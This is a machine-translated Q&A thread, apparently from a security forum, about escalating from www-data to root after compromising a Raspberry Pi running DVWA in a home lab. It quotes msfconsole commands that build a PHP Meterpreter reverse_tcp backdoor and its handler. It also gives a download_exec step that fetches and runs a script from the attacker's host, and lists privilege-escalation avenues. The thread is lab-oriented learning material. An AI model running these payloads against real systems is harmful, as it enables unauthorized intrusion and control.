web-dev-qa-db-ja.com

MSFConsole / Kali Linux-UNIXシステムへのrootアクセス権を取得します

私はKali Linux、MSFConsole、DVWA(Damn Vulnerable Web Application)をいじっています。

PHPバックドアを作成し、SQLインジェクションを介してアップロードすることで、システム(Raspberry Pi)に正常にアクセスできました。

これでシステムにアクセスできました。唯一の問題は、www-dataとして実行していることです(rootになって自分のスーパーユーザーアカウントを作成するのはいいことではないでしょうか?)Linux(Raspbaian)で特権をエスカレートできますか? MSFConsole、BASH(バックドアから)、または別の方法を使用して?

Meterpreterプロンプトで「use priv」を実行しようとしましたが、「拡張機能のロードに失敗しました:ext_server_priv.phpという名前のモジュールが見つかりません」というエラーが表示されます。それが役立つ場合、reverse_tcpエクスプロイトをPHPスクリプトとして実行しています。

これを実行することでシステムを危険にさらすことができましたMsfconsole

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

次に、安全でないファイルのアップロードを介してhackme.phpをWebサーバーにアップロードしました。その後、アップロードしたファイルを参照しました。

クレジットは、上記のコードを提供してくれた このビデオ に送られます。 (msfpayloadの代わりに生成関数を使用する必要があったのは、その機能が廃止されたために移動されたためです。)

9
iProgram

この時点で、システムの侵害の基本を達成し、権限昇格という悪用の一般的なフェーズ2に進んでいます。

正確にどのように達成できるかは、問題のシステム、システムにインストールされているコード、構成方法に大きく依存します。 Linuxシステムで特権昇格を取得するために探す必要のあるオプション

  • 実行しているユーザーが書き込み可能なSetUIDルートバイナリ。上書きできるものが見つかれば、実行時にrootとして実行され、これを使用して特権をエスカレートできます。
  • Rootとして実行されているシステムサービスの脆弱性。これはおそらく、実行中のシステムのパッチステータスに依存します。

「実際の」セキュリティテストでより多く適用されるが、状況に適用される可能性が低いその他の事項

  • システム上のファイルで公開されている資格情報。これは、システムを悪用する一般的な方法です。
  • パスワード推測攻撃。資格情報を推測することは、追加のアクセス権を取得するための良い方法です
  • 攻撃されたシステムから同じネットワーク内の別のシステムにピボットします。通常、攻撃者がネットワークに足場を築くと、悪用される可能性がある追加の中間構成を持つ可能性のある他のシステムをスキャンします。
6
Rory McCune

Metasploitのドキュメントによると、ユーザーprivはネイティブのWindows Meterpreterでのみ利用可能なモジュールです(他のMeterpreterではありません)。

おそらく、UNIXの特権の昇格について調べたいと思います。それを行うmetasploitの自動化モジュールがあるとは思いません...

幸運を ;)

1
RedPanda

シェルをセッション-u <#>でMeterpreterにアップグレードしてから、postモジュール(たとえば、post/multi/recon/local_exploit_suggester)を実行するか、既存のセッション(Meterpreterかどうか)を取得してローカル権限エスカレーションを実行することもできます。 SESSION変数を設定して、udev_netlink、sock_sendpageなどを悪用します。

一部のモジュールはOSまたはシナリオによって異なり、メタスプロイトフレームワーク階層で見つけるのが難しいモジュールもあります。 meterpreter内から以下を試してください。

投稿を表示

post/multi/<tab><tab>を実行します

post/linux/<tab><tab>を実行します

エクスプロイト/マルチ/ <tab><tab>を実行します

Metasploit-frameworkの外でさまざまな権限昇格ツールを実行して、セッションに起動することもできます。この取り組みを支援する2つのモジュールを次に示します。

post/multi/gather/multi_commandを使用

リソースcmds.rcを設定する

post/linux/manage/download_execを使用します

uRLを設定 http://10.0.0.1/cmds.sh

ラボでシステムを準備することをお勧めします。たとえば、同じOS、パッチレベル、インストール可能ファイル、構成設定など、ターゲットシステムの 品質に一致 です。このモックアップされたラボターゲットでrootアクセスを維持することにより、実際のターゲットに対して実行しようとすることを再作成できます。多くの特権エスカレーションツールは、それらを適切に実行するためにルートアクセスを必要とします。たとえば、資格情報モードでのNessusおよびOpenVAS、CIS-CAT、ovaldi、cvechecker、lynis、unix-privesc-check、およびenum4linuxは、すべてこの優れたツールです。スペース。その他のプログラムは、実際のターゲットシステムでのみ実行する必要があります。 custom setuid/setgid バイナリの悪用など、一部の権限昇格攻撃では大幅に多くの計画が必要です。 RPiはエクスプロイトのためにクロスコンパイラーを必要とする可能性が高く、オフセットを変更してARMプラットフォームのレジスター、オペコード、エンディアンネスを操作しない限り、多くの場合は機能しません。

1
atdre